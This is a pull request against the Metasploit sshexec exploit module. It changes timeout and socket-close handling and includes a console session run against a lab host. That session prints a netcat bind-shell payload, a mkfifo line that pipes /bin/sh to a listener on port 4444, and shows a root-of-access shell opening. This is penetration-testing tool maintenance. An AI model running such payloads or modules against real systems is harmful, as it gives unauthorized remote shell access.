### PR TITLE
Fix sshexec hanging on exec! and blocking close

### DIFF
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'net/ssh'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
@@ -151,7 +149,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
         Opt::RHOST(),
         Opt::RPORT(22)
-      ], self.class
+      ]
     )
 
     register_advanced_options(
@@ -164,12 +162,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, opts = {})
     vprint_status("Executing #{cmd}")
     begin
-      Timeout.timeout(5) do
-        self.ssh_socket.exec!("#{cmd}\n")
-      end
+      Timeout.timeout(3.5) { ssh_socket.exec!(cmd) }
     rescue Timeout::Error
-      print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.")
-      print_good("You will likely still get a shell; run sessions -l to be sure.")
+      print_warning('Timed out while waiting for command to return')
+      @timeout = true
     end
   end
 
@@ -186,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
       :verify_host_key => :never
     }
 
-    opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG'])
+    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']
 
     begin
       self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
@@ -200,24 +196,22 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
     end
 
-    if not self.ssh_socket
-      fail_with(Failure::Unknown, 'Failed to start SSH socket')
-    end
-    return
+    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
   end
 
   def exploit
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
     print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
 
-    if target['Platform'] == 'python'
+    case target['Platform']
+    when 'python'
       execute_command("python -c \"#{payload.encoded}\"")
-    elsif target['Platform'] == 'unix'
+    when 'unix'
       execute_command(payload.encoded)
     else
       execute_cmdstager(linemax: 500)
     end
 
-    self.ssh_socket.close
+    @timeout ? ssh_socket.shutdown! : ssh_socket.close
   end
 end


### PR DESCRIPTION
This _may_ fix most of the troubling behavior we've seen in this module.

```
msf5 > use sshexec

Matching Modules
================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  exploit/multi/ssh/sshexec  1999-01-01       manual  No     SSH User Code Execution


[*] Using exploit/multi/ssh/sshexec
msf5 exploit(multi/ssh/sshexec) > set rhosts 172.28.128.3
rhosts => 172.28.128.3
msf5 exploit(multi/ssh/sshexec) > set username vagrant
username => vagrant
msf5 exploit(multi/ssh/sshexec) > set password vagrant
password => vagrant
msf5 exploit(multi/ssh/sshexec) > set target Unix\ Cmd
target => Unix Cmd
msf5 exploit(multi/ssh/sshexec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf5 exploit(multi/ssh/sshexec) > run

[*] 172.28.128.3:22 - Sending stager...
[*] Executing mkfifo /tmp/ixylsf; (nc -l -p 4444 ||nc -l 4444)0</tmp/ixylsf | /bin/sh >/tmp/ixylsf 2>&1; rm /tmp/ixylsf
[!] Timed out while waiting for command to return
[*] Started bind TCP handler against 172.28.128.3:4444
[*] Command shell session 1 opened (172.28.128.1:64639 -> 172.28.128.3:4444) at 2019-06-27 22:14:19 -0500

id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```

Fixes #12021, in a cheap way.